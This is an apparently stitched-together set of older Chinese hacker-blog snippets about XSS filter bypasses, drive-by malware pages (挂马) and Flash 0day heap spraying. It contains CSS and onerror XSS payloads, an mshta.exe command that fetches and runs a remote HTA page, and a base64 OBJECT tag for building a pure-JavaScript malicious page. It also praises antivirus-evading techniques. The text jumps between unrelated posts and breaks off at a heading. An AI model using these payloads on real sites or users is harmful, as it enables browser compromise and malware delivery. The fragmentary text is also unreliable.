先说明一下，比较老了，应该有一两年了。

1.首先会过滤CSS类型的XSS

<style>#1 {background-image:url("javascript:alert('XSS')}<style>

2.正好CSS里可以用注释符。

<style>#1 /*XXXXXXXX*/ {background-image:url("javascript:alert('XSS')")}<style>

3.在EMAIL里FUZZ出注释符/*" XSS "*/ /*' XSS '*/里的XSS不被过滤

<style>#1 /*"{background-image:url("javascript:alert('XSS')")}

如：

mshta.exe http://raystyle.googlepages.com/hta.html

这个TIPS适用于一些需要点击“链接”的特殊协议命令注入漏洞。

这几天有意无意的关注Flash 0day的挂马情况：

1. 国内版的看到了三个不同版本，区别不大，就是堆喷跳的地址不同。

2 .网页代码略有不同，貌似是两个生成器。

3. 国内版的Flash 0day 网马还没有出现ActionScript堆喷的样本。

另外一些小八卦：

5月的幻影杂志第三期专访

饿着肚子等到晚上，从很低调的某牛那里顺到了样本。测了下，flash 9和10范围通杀，需要结合堆喷执行代码，几乎无视浏览器环境，不过IE8默认DEP基本上没什么办法咯。

这个月0DAY一波接一波，基本上是每隔一个星期暴一个。sigh~当之无愧的0DAY月啊。

附图一张：

TIPS如下，完全不需要LOGO.GIF，整个网马可以变成一个纯JS。

<OBJECT classid="xxx" type="XXXX" data="data:application/XXXX;Base64,xxxxxxxxxx"></OBJECT>

参考：

http://code.google.com/p/ie7-js/source/browse/test/object-base64.html

现在的挂马客赚钱赚到手发软了，抱着能中就行、装杀软有几个会中的这种心态，所以不屑于改变已有的技术模式。下面我就随便说一说一些高级挂马技术：

比如06年某牛写的一篇HeapSpray In Flash的未公开的文档，使用了ActionScript的ByteArray类实现堆喷，整个EXP除开调用AX部分和漏洞BUFFER部分使用了ExternalInterface.call来运行JS，完全实现了一个不需要JS的纯FLASH的HeapSpray模版。

在冰狐浪子网马时代就被使用过的，当时没有任何杀毒软件能杀，仅仅几个人私下在用的AJAX EVAL responseText全免杀网马。

DirectShow 0DAY第二波爆发！！该漏洞在国内已经呈大规模爆发形势。至少有几千网站被挂上了该漏洞的网页木马！

漏洞攻击细节：

<img src='#' onerror="alert();}a={">

结果会是什么呢?老版本的chrome浏览器里有更有意思的现象发生 :)

来源：http://www.thespanner.co.uk/2009/06/23/csp-mozilla-content-security-policy/

代码：

alert(1);/*<script src="#"></script>*/

分析：